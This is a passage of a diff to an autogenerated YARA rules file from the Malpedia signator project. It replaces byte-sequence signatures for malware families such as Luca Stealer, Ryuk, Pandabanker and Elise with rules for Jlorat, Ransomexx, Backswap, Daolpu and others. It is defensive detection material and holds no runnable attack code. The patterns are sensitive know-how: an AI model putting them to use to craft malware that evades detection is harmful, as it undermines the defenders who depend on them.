+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.nosedive_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "2b38c28929c2cf366b6c27d4893332041148ce4dfc12e9c48178a2f3e634135c"
+		logic_hash = "437edcb731a71f57346014b7f168c5a7e19b62836d7ab5266e2b058730d6e731"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86702,32 +86880,32 @@ rule MALPEDIA_Win_Luca_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83a4248800000000 4c8d842488000000 4c8bcf 488d4c2430 488bd0 e8???????? }
-		$sequence_1 = { e8???????? 488d8d60110000 4889f2 4c8b85a01c0000 e8???????? 488b03 4885c0 }
-		$sequence_2 = { e8???????? 48c70702000000 4883fb01 740e 89d8 83e002 4885c0 }
-		$sequence_3 = { e8???????? 80385d 750b 8b4b58 394804 7503 897004 }
-		$sequence_4 = { e8???????? 488d8d801e0000 e8???????? 0f28742470 0f287c2460 440f28442450 4881c488000000 }
-		$sequence_5 = { e8???????? 4c8d442450 488bd0 488bce 488be8 e8???????? 8bf8 }
-		$sequence_6 = { e9???????? 4d892e e8???????? 85c0 0f84e9040000 4d85ff 0f84e0040000 }
-		$sequence_7 = { eb0e 44894c2434 498bf0 4983f8ff 7448 488b9778010000 458bc7 }
-		$sequence_8 = { eb34 4585c9 7407 b9180a0100 eb28 3bd7 7607 }
-		$sequence_9 = { eb02 31c0 4883c428 c3 488b01 488b4808 8b4010 }
+		$sequence_0 = { a801 0f84d1000000 48c7c098ffffff 64448b30 64c70000000000 41ffc7 7441 }
+		$sequence_1 = { eb02 31c9 488b4038 4c89542428 48890c24 4889c7 4889442418 }
+		$sequence_2 = { 895d10 48894508 85db 0f8e81000000 4531ff 0f1f00 4489fe }
+		$sequence_3 = { 85c0 0f8fb2030000 4c8da3be000000 4c89e7 e8???????? 85c0 0f8f7b030000 }
+		$sequence_4 = { 894f78 898740010000 f3410f6f01 0f118744010000 f3410f6f4910 0f118f54010000 f3410f6f5120 }
+		$sequence_5 = { 4531c0 4c8b4c2418 488b742410 49bfffffffffffff0000 4c89cb 4d89cd 4d21cf }
+		$sequence_6 = { e8???????? 4d89e1 4189d8 4c89e2 4889c1 4889ee 4c89f7 }
+		$sequence_7 = { 880f c3 8b4c16fc 8b36 894c17fc 8937 c3 }
+		$sequence_8 = { a801 7527 488b8790000000 48837f6800 48890424 7415 488b0424 }
+		$sequence_9 = { b902160000 e9???????? 4c8d052df80e00 b9f7150000 be01000000 488d156cf30e00 e8???????? }
 
 	condition:
-		7 of them and filesize < 9285632
+		7 of them and filesize < 3268608
 }
-rule MALPEDIA_Win_Domino_Auto : FILE
+rule MALPEDIA_Win_Jlorat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5d360219-88f3-51b6-b0a7-8c0e8e115450"
+		id = "1d1cf35b-b348-5281-a39e-6f479f3341d0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.domino"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.domino_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jlorat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jlorat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "0494b0021734ccd5b5bbf5e2e5a90aaa191fbeb0b0a8f17de8e34620de4c33b7"
+		logic_hash = "f1e1cc634deaa339c16c9b45b57e58aeaba6eb3b461fa4ec4f4f48da46c3a4c6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86741,32 +86919,32 @@ rule MALPEDIA_Win_Domino_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7514 66c7030209 e9???????? 66c7030208 }
-		$sequence_1 = { 448bc5 488bd6 488bf8 ff15???????? }
-		$sequence_2 = { 84c0 750f 66c7030101 b802000000 e9???????? 488d942450010000 }
-		$sequence_3 = { ff15???????? eb34 ff15???????? 488bd7 b940000000 }
-		$sequence_4 = { 72ce 66c7030102 33c0 41c7042402000000 488b5c2458 }
-		$sequence_5 = { 56 57 4156 4883ec30 498bd8 4863f2 488bf9 }
-		$sequence_6 = { ff15???????? 85c0 741a 488b4c2458 }
-		$sequence_7 = { 4889442420 e8???????? 85c0 742e 33db }
-		$sequence_8 = { 48896c2410 4889742420 57 4881ec60020000 }
-		$sequence_9 = { 4c89742420 89757f ff15???????? f7d8 1bdb 235d7f }
+		$sequence_0 = { ff7004 e8???????? 83c40c 8b45e8 64a300000000 83c414 5e }
+		$sequence_1 = { f20f118620010000 c786c801000004000000 89e0 8d8e20010000 894804 8d8e08010000 8908 }
+		$sequence_2 = { f20f1145c4 894dd0 8945d4 c745f000000000 89e0 c7400404000000 c70014000000 }
+		$sequence_3 = { e9???????? 8b3424 897c242c 8bbc2418020000 83ff29 0f8339090000 85ff }
+		$sequence_4 = { f20f118eb00e0000 f20f1186a80e0000 8b86b80e0000 8986d00e0000 f20f1086a80e0000 f20f108eb00e0000 f20f118ec80e0000 }
+		$sequence_5 = { eb00 8b8d6cffffff 8b8558ffffff 8945d0 89e0 8908 e8???????? }
+		$sequence_6 = { c745f000000000 89e0 8d4da8 8908 e8???????? eb00 8b855cffffff }
+		$sequence_7 = { 8b4d0c 51 8b5508 52 e8???????? 83c40c 0fb64510 }
+		$sequence_8 = { f6861701000001 7552 8b8e10010000 89e0 894804 8d8e48010000 898efc000000 }
+		$sequence_9 = { eb00 8b4de0 83c140 c745f002000000 89e0 8908 e8???????? }
 
 	condition:
-		7 of them and filesize < 50176
+		7 of them and filesize < 10952704
 }
-rule MALPEDIA_Win_Ncctrojan_Auto : FILE
+rule MALPEDIA_Win_Longwatch_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "73693e19-d3ac-5418-9f8a-95e68a6f57fb"
+		id = "b41781a5-fa9e-5caa-89a9-6b017c4409b3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ncctrojan_auto.yar#L1-L170"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.longwatch_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "27c3caf8c915c86b411337145e185c50823300943eb40fbabcf07830267e1942"
+		logic_hash = "7e9f24cefc29fec880f531c16b44bc6a332c0d308ff5c0a0db91cf7bbb28f078"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86780,40 +86958,34 @@ rule MALPEDIA_Win_Ncctrojan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f805 7536 8b85e8feffff 85c0 750a }
-		$sequence_1 = { 68???????? e9???????? 83f801 750a }
-		$sequence_2 = { 750a 68???????? e9???????? 83f802 }
-		$sequence_3 = { e9???????? 83f802 0f85bb000000 68???????? e9???????? 83f806 }
-		$sequence_4 = { 8d44247c 6800400000 50 e8???????? 83c40c }
-		$sequence_5 = { ff15???????? 83f8ff 0f85e0000000 ff35???????? ff15???????? }
-		$sequence_6 = { 8d442450 50 6a00 68e9fd0000 ffd7 8d842470050000 }
-		$sequence_7 = { 50 e8???????? 83c414 8d442450 50 8d44247c }
-		$sequence_8 = { 56 ff15???????? 8b8580fffeff 83781408 }
-		$sequence_9 = { 50 e8???????? 8b4d08 e8???????? e9???????? 8b4d08 e8???????? }
-		$sequence_10 = { 6804010000 8d85f0fbffff 50 56 }
-		$sequence_11 = { 8965f0 6a01 8945ec 40 6a00 }
-		$sequence_12 = { 56 57 6a00 68e9fd0000 ff15???????? 57 8bf0 }
-		$sequence_13 = { 50 e8???????? 83781408 7202 8b00 50 8d85f0fbffff }
-		$sequence_14 = { 56 57 6a00 ff750c ff15???????? 57 }
-		$sequence_15 = { 50 e8???????? 6aff 8d4601 c645fc03 50 8d8518ffffff }
+		$sequence_0 = { 53 8b5d10 8b0485a00b4300 56 8b7508 }
+		$sequence_1 = { 68???????? e8???????? 83c404 6a00 ff15???????? 85c0 }
+		$sequence_2 = { 8b0485a00b4300 f644082801 7406 8b440818 5d }
+		$sequence_3 = { 8be5 5d 8be3 5b c3 33c0 50 }
+		$sequence_4 = { e9???????? 6a40 e9???????? 6a23 }
+		$sequence_5 = { 85c0 0f8559010000 e8???????? c70021000000 e9???????? 894ddc c745e01c954200 }
+		$sequence_6 = { 8b41e0 8b4004 c74408e090bb4200 8b41e0 8b5004 }
+		$sequence_7 = { 75de 33c0 85c0 0f94c0 c3 1bc0 }
+		$sequence_8 = { 0f8484000000 8b45f0 8b0485a00b4300 8a44022b }
+		$sequence_9 = { 8975f0 c745f4dc804200 8b7485bc 8d4601 8945b8 }
 
 	condition:
-		7 of them and filesize < 1160192
+		7 of them and filesize < 647168
 }
-rule MALPEDIA_Win_Ryuk_Auto : FILE
+rule MALPEDIA_Win_Scanpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "721acb27-a4a0-50f9-a1d2-cd2f2b4d785d"
+		id = "68b120db-1dba-5584-bc59-126fea6e111e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ryuk_auto.yar#L1-L449"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.scanpos_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "445b298ca90f42d0360a842e111170d0d02597be6aa1ae9b7c72639822721220"
+		logic_hash = "a62211e1eb96c58c9bf699a15d117ca283e56d459f8aea50975f3891740e6968"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -86825,72 +86997,32 @@ rule MALPEDIA_Win_Ryuk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 6a01 6a00 6814010000 }
-		$sequence_1 = { 85c0 7508 6a01 ff15???????? 68???????? 6a01 }
-		$sequence_2 = { 6a08 6a18 68???????? 68???????? 68???????? }
-		$sequence_3 = { 7578 6a10 6a18 68???????? }
-		$sequence_4 = { 66398818000035 753e 8b4508 b9???????? 2bc1 50 }
-		$sequence_5 = { 68???????? 68???????? 68???????? ff15???????? 85c0 7525 6a08 }
-		$sequence_6 = { ff15???????? 85c0 7542 6a28 6a18 68???????? }
-		$sequence_7 = { ff15???????? 85c0 7578 6a10 }
-		$sequence_8 = { 81b8????????50450000 754c b90b010000 66398818000035 753e 8b4508 }
-		$sequence_9 = { 68c0cf6a00 ff15???????? 6a01 ff15???????? }
-		$sequence_10 = { e8???????? 68e8030000 ff15???????? 68???????? e8???????? }
-		$sequence_11 = { 7407 b801000000 eb0b eb04 33c0 eb05 b801000000 }
-		$sequence_12 = { ba01000000 c1e200 8b45fc 880c10 b904000000 6bd103 817c15d8ff000000 }
-		$sequence_13 = { b804000000 c1e000 8b4c05d8 83c101 ba04000000 c1e200 894c15d8 }
-		$sequence_14 = { 2b4df4 394dfc 7312 ba01000000 }
-		$sequence_15 = { ba01000000 8b4df0 d3e2 0b55f8 8955f8 ebd6 eb02 }
-		$sequence_16 = { 0f870b020000 720c 8b459c 3b45f4 0f87fd010000 b904000000 c1e100 }
-		$sequence_17 = { 6bc203 8b4dfc c6040100 ba01000000 d1e2 8b45fc c6041000 }
-		$sequence_18 = { ff15???????? b811000000 e9???????? e9???????? }
-		$sequence_19 = { 7407 48 85c0 7ff0 }
-		$sequence_20 = { 6a00 6814010000 ff7508 ff35???????? ff15???????? }
-		$sequence_21 = { ff35???????? ff15???????? 833d????????00 6a10 6a18 }
-		$sequence_22 = { 751b ff35???????? ff35???????? 6a01 68???????? e8???????? 83c410 }
-		$sequence_23 = { ff15???????? b803000000 eb05 b805000000 }
-		$sequence_24 = { 2bf0 33c0 66890473 83ffff }
-		$sequence_25 = { 56 ff15???????? 8bcb 8d5102 }
-		$sequence_26 = { e8???????? e8???????? b9e8030000 ff15???????? }
-		$sequence_27 = { 7714 7212 81f9d0070000 770a 85d2 }
-		$sequence_28 = { eb0b 8bc1 99 f7fe }
-		$sequence_29 = { 0f9fc0 5d c3 8bff 55 8bec 8b4508 }
-		$sequence_30 = { 8d5f02 668b4702 83c702 6685c0 }
-		$sequence_31 = { 488bc3 4883c430 5b c3 48895c2408 48896c2410 }
-		$sequence_32 = { 53 d1fe e8???????? 83c408 8d5002 }
-		$sequence_33 = { 6685c9 75f5 2bf2 68???????? 53 }
-		$sequence_34 = { 8bc8 83e103 f3a4 8d7afe 668b4702 8d7f02 }
-		$sequence_35 = { 8d7f02 6685c0 75f4 a1???????? 8907 eb03 }
-		$sequence_36 = { 83c202 6685c0 75f5 8d7bfe 2bd6 8d5f02 }
-		$sequence_37 = { 498bc1 c3 4053 4883ec20 8bc1 498bd8 }
-		$sequence_38 = { 4883c428 c3 48895c2408 57 4883ec30 8364242000 }
-		$sequence_39 = { ba00000040 ff15???????? 488bd8 ff15???????? 83f820 }
-		$sequence_40 = { ff15???????? 41b900800000 4533c0 488bd6 488bcf }
-		$sequence_41 = { 66837f0254 750f 66837f0641 7508 }
-		$sequence_42 = { 66833f4e 7516 66837f0254 750f }
-		$sequence_43 = { 33c9 ba10270000 41b800100000 448d4904 ff15???????? }
-		$sequence_44 = { d1e8 03c2 c1e806 6bc05a }
-		$sequence_45 = { e8???????? 99 2bc2 d1f8 85c0 }
-		$sequence_46 = { 33c9 ff15???????? 48897c2430 488d4c2440 c744242802000000 4533c9 }
-		$sequence_47 = { 8b5c3050 ff15???????? 41b900300000 c744242040000000 }
-		$sequence_48 = { ff15???????? 488bf8 4885c0 7410 ff15???????? 488bc8 }
-		$sequence_49 = { e8???????? 84c0 746c e8???????? 488d0d63080000 e8???????? e8???????? }
+		$sequence_0 = { e8???????? 83c404 84db 0f85c1010000 8d75d4 b8???????? }
+		$sequence_1 = { 754b 8b74183c 3bf7 7443 8b16 }
+		$sequence_2 = { 40 84c9 75f9 2bc2 8bf8 8d759c }
+		$sequence_3 = { b8???????? e8???????? 83781000 bf10000000 0f94c3 397de8 720c }
+		$sequence_4 = { 0f85ef000000 b208 8d642400 0fbec2 8a0c38 03c7 80f939 }
+		$sequence_5 = { 8975f0 c74431b0a4414100 8d4eb4 c745fc00000000 e8???????? }
+		$sequence_6 = { 8b74183c 3bf7 7443 8b16 8b4204 f644300c06 7517 }
+		$sequence_7 = { 68???????? 8d4df4 51 c745f430124100 }
+		$sequence_8 = { ff15???????? 8b7508 c7465c682a4100 83660800 33ff }
+		$sequence_9 = { 83c004 57 e8???????? a1???????? 50 }
 
 	condition:
-		7 of them and filesize < 7450624
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Xbtl_Auto : FILE
+rule MALPEDIA_Win_Ransomexx_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cc674cdb-617d-59f2-a495-aa1cae2d983f"
+		id = "2fe059c2-8452-5b3e-8480-0e870f1f94ef"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xbtl_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ransomexx_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "f0bc6d62656eb26327c6c65c34f325364618e94666f302ef6065ecc9e58e240b"
+		logic_hash = "f81d34b7c74a7d97ad1f03442803ea61bc2884bb95c0d382a5757d938c26aeda"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86904,32 +87036,32 @@ rule MALPEDIA_Win_Xbtl_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c41c 56 e8???????? 83c404 57 e8???????? 8b4df8 }
-		$sequence_1 = { 83c404 33ff b8???????? 8bd6 897c2420 2bd0 }
-		$sequence_2 = { 8b4320 8b95e0fcffff 50 8d8df4feffff 68???????? 51 c6047200 }
-		$sequence_3 = { 51 52 e8???????? 43 83c40c 89450c 3b5df8 }
-		$sequence_4 = { 85ff 75ef c745fcffffffff 6a01 e8???????? 8bf8 8b4f0c }
-		$sequence_5 = { 84c0 7429 0fb63e 0fb6c0 eb12 8b45e0 8a803c884100 }
-		$sequence_6 = { 33d1 03f2 03b4bdb8feffff 8b95b8feffff 8db41ea1ebd96e 8985b0feffff 8b85b4feffff }
-		$sequence_7 = { 8985ccfdffff 83f8ff 0f8409020000 8b95d0fdffff 6a00 8d8de8fdffff 51 }
-		$sequence_8 = { 50 53 68???????? 68???????? 57 e8???????? 57 }
-		$sequence_9 = { 7411 8b45f8 57 50 }
+		$sequence_0 = { 897708 8d7b50 3bfe 7439 8b4f08 3bce }
+		$sequence_1 = { 3bc1 744b 8d542420 52 }
+		$sequence_2 = { 13542440 894838 8b4c247c 034c242c 89503c 8b942480000000 13542430 }
+		$sequence_3 = { 57 8d45e0 e8???????? 8bf8 83c404 3bfb 0f8506020000 }
+		$sequence_4 = { 83c204 c6462400 8955f0 8b5dfc 8ad0 80e27f 029018b44100 }
+		$sequence_5 = { c1ee03 33fe 03df 8b7dfc 039c3db8feffff 8bb43d94feffff 03f3 }
+		$sequence_6 = { 33f7 8b7d08 83c004 c1e608 8955ec 8945fc c1ef08 }
+		$sequence_7 = { 89442440 89442444 89442448 e8???????? 83c40c 83bc248800000000 8d842490020000 }
+		$sequence_8 = { 83c404 85c0 7539 8b55fc 8917 5f }
+		$sequence_9 = { 8975dc 3338 8bda 897dec 8bfe c1ef10 81e7ff000000 }
 
 	condition:
-		7 of them and filesize < 401408
+		7 of them and filesize < 372736
 }
-rule MALPEDIA_Win_Unidentified_074_Auto : FILE
+rule MALPEDIA_Win_Albaniiutas_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "18d2173e-134a-5069-ab8f-b9abd19f1bd3"
+		id = "ed214e5c-6897-5f8e-bd2b-0bb8f51690d9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_074"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_074_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.albaniiutas_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "6dab9e5ae43cc86eae4e300f173218fa8732c7df5d913a5bb2fedc84e5de19c3"
+		logic_hash = "4a292a9bd7e73dd3f8f38b0c5f35ad3036161e113ab281f4d09533b41c3cbb43"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86943,32 +87075,32 @@ rule MALPEDIA_Win_Unidentified_074_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7417 0fb732 8bcb b8???????? 663930 }
-		$sequence_1 = { 33c0 c78524e7ffff07000000 66898510e7ffff 8d85f8e6ffff 50 8d8540e7ffff }
-		$sequence_2 = { 8b07 eb02 8bc7 8b55e0 }
-		$sequence_3 = { 68???????? c60300 e8???????? 8d8d58e7ffff e8???????? }
-		$sequence_4 = { 894dfc 8b7e10 c745f001000000 8b4310 40 }
-		$sequence_5 = { c78524e7ffff07000000 66898510e7ffff 8d85f8e6ffff 50 8d8540e7ffff c78520e7ffff00000000 50 }
-		$sequence_6 = { 7504 33c9 eb18 8d8d88e7ffff 8d5102 668b01 }
-		$sequence_7 = { 68???????? 50 e8???????? 8b4dfc 83c424 f7d8 }
-		$sequence_8 = { 50 ffb578dfffff e8???????? 33c0 c7858cdfffff07000000 }
-		$sequence_9 = { e8???????? c743140f000000 c7431000000000 c60300 8b9584e7ffff 83fa10 }
+		$sequence_0 = { 743a 8d45f4 50 6a01 ff75fc 6810660000 }
+		$sequence_1 = { ff75fc 6810660000 ff75f8 ff15???????? }
+		$sequence_2 = { 40 c745ec48770010 894df8 8945fc 64a100000000 8945e8 8d45e8 }
+		$sequence_3 = { 83e03f c1f906 6bc030 03048d90df0210 50 }
+		$sequence_4 = { 83e63f c1ff06 6bf630 8b04bd90df0210 f644302880 741f e8???????? }
+		$sequence_5 = { 83c418 8945d4 85c0 740f 8b4508 c74018241c0110 }
+		$sequence_6 = { 8d5b01 33c8 c1e808 81e1ff000000 33048dc01c0110 4f 75e5 }
+		$sequence_7 = { 83e805 7456 83e801 0f859b010000 c745e0e87c0110 8b4508 8bcf }
+		$sequence_8 = { 3998c8a10110 0f84ea000000 41 83c030 894de4 }
+		$sequence_9 = { 331c85c0280110 335e08 8bcb 8bc3 }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 566272
 }
-rule MALPEDIA_Win_Pandabanker_Auto : FILE
+rule MALPEDIA_Win_Backswap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "751a691a-c53d-5542-8dd0-6d6e61efc66b"
+		id = "6e17f855-5952-50ed-bf6a-366f7e607462"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pandabanker_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.backswap_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "af183af405489953bbbd5be29d963fc77205c0eef74bef65d65833acc7e1921c"
+		logic_hash = "bb4d774b5a39969b7683aade4505aad39c80dbe023defeb6c0c050fb546e7038"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86982,34 +87114,34 @@ rule MALPEDIA_Win_Pandabanker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85f6 7e26 8be8 8d831c020000 8bd8 }
-		$sequence_1 = { 5a 0f45d0 8bce e8???????? }
-		$sequence_2 = { 8bf0 85f6 746d 8b470c 25fffeffff 89460c 8b4714 }
-		$sequence_3 = { 8b36 4a 85f6 75f5 }
-		$sequence_4 = { 8bcf 42 e8???????? 85c0 741c 85db 7407 }
-		$sequence_5 = { 8bc6 5e c3 8a01 3c30 7c0c }
-		$sequence_6 = { 46 33c9 803a2d 7504 }
-		$sequence_7 = { 8b4e18 8bd5 e8???????? 85c0 }
-		$sequence_8 = { 896c240c 8bda 57 83feff 7509 8bcb e8???????? }
-		$sequence_9 = { 88542412 80e380 88542411 8ae2 }
+		$sequence_0 = { eb1c 85c9 7508 3bdf }
+		$sequence_1 = { c21000 83f0ff 5e 5f 5a }
+		$sequence_2 = { 4b eb1c 85c9 7508 3bdf }
+		$sequence_3 = { 33c9 e9???????? b32a 397d14 7412 47 8a07 }
+		$sequence_4 = { 33c9 33d2 8bdf 4b eb1c 85c9 }
+		$sequence_5 = { ff4508 8bfb 3bd3 0f8572ffffff 33c9 }
+		$sequence_6 = { 3c3f 74c4 3c2a 7508 8bdf 897508 4e }
+		$sequence_7 = { f366a5 59 5f 5e c9 c20c00 55 }
+		$sequence_8 = { 7404 8bce 8bd3 397d14 0f8e99000000 39750c 7e7b }
+		$sequence_9 = { ff4508 8bfb 3bd3 0f8572ffffff 33c9 e9???????? }
 
 	condition:
-		7 of them and filesize < 417792
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Elise_Auto : FILE
+rule MALPEDIA_Win_Daolpu_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "11ed4b5e-b7d9-57f1-b779-a93a47cbf173"
+		id = "3b934422-e9dc-512e-b748-acfa3a6df0b8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.elise_auto.yar#L1-L209"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.daolpu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.daolpu_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "09615a6853721651624e029a2091d82fab132dd6d80506edb16bc08b652a8438"
+		logic_hash = "75ecbdb2c7e8916d3ac65192115d743be9db42508dfb2c41a685a14b393ff7b1"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -87021,43 +87153,32 @@ rule MALPEDIA_Win_Elise_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8dbe1e050000 f3ab 8bc2 0fb7d0 }
-		$sequence_1 = { 7205 8d0429 eb02 33c0 5f 5e }
-		$sequence_2 = { 4e 237720 d3e6 59 }
-		$sequence_3 = { 8b10 53 8a5c2408 8d4804 }
-		$sequence_4 = { 7ce9 33c0 40 5b 5e 5f c3 }
-		$sequence_5 = { 8bc6 e8???????? 85c0 0f8484000000 53 }
-		$sequence_6 = { 55 33c9 57 ba00040000 85c0 760e }
-		$sequence_7 = { 8bcb 8d3470 d3e0 0945f4 43 83fb04 }
-		$sequence_8 = { 7cf5 33c9 888f00010000 888f01010000 8bf7 8945f8 }
-		$sequence_9 = { 885d88 e8???????? 83c40c 8d4580 }
-		$sequence_10 = { 33f6 46 d3e6 0bd6 40 83f80e 72e7 }
-		$sequence_11 = { ff15???????? eb0b 6a02 53 53 }
-		$sequence_12 = { ff75ec 1155f4 53 e8???????? 8bd8 8955ec }
-		$sequence_13 = { 56 57 b99a000000 8d7510 }
-		$sequence_14 = { eb03 8b7df4 8d4e01 81e1ff000080 7908 49 }
-		$sequence_15 = { 6a20 e8???????? 59 8bd8 }
-		$sequence_16 = { 46 4f 75eb f7d0 5f 5e }
-		$sequence_17 = { 83c40c 8d4580 50 8d4588 50 53 }
-		$sequence_18 = { 85ff 7415 0fb616 33d0 23d1 }
-		$sequence_19 = { 50 ff7580 e8???????? 85c0 }
-		$sequence_20 = { 59 8b45f0 8b55f4 5f 5e 5b c9 }
+		$sequence_0 = { eb30 e9???????? 488d4c2440 e8???????? 48c7842428010000ffffffff 488d8c2490000000 e8???????? }
+		$sequence_1 = { 75b0 0f28442430 488b5d97 0f1103 488d4dcf e8???????? 4c8b45ef }
+		$sequence_2 = { ebd9 488b442428 488b00 4889442430 49ba7030525e472705d3 488b442430 ff15???????? }
+		$sequence_3 = { 7612 49ffc0 488b542448 488d4c2440 e8???????? 4c897c2458 48c74424600f000000 }
+		$sequence_4 = { 7460 498bff 4c8d2dbe660900 498bc7 4a8b5c2808 483beb 7233 }
+		$sequence_5 = { 66c74424380100 488b45b0 48634804 488b4c0df8 48894c2470 4885c9 0f94442478 }
+		$sequence_6 = { 48896c2450 4c896c2448 4c8d2d4ea2f9ff 4c89742440 41be08000000 48899c2480000000 6666660f1f840000000000 }
+		$sequence_7 = { 7508 4883eb01 75eb eb1e 4885db 7419 0f1f4000 }
+		$sequence_8 = { 488b17 488d4203 483bc1 7709 4a8d0402 e9???????? 397320 }
+		$sequence_9 = { 488d8c24a8000000 e8???????? 83781000 740a b8ffff0000 e9???????? 488d8c24a8000000 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 2877440
 }
-rule MALPEDIA_Win_Maui_Auto : FILE
+rule MALPEDIA_Win_Minibus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fae207f4-bee0-581e-92b7-618fcd87980f"
+		id = "1ad5e3c7-76e6-5ca8-ae27-272222a9f62c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maui"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.maui_auto.yar#L1-L133"
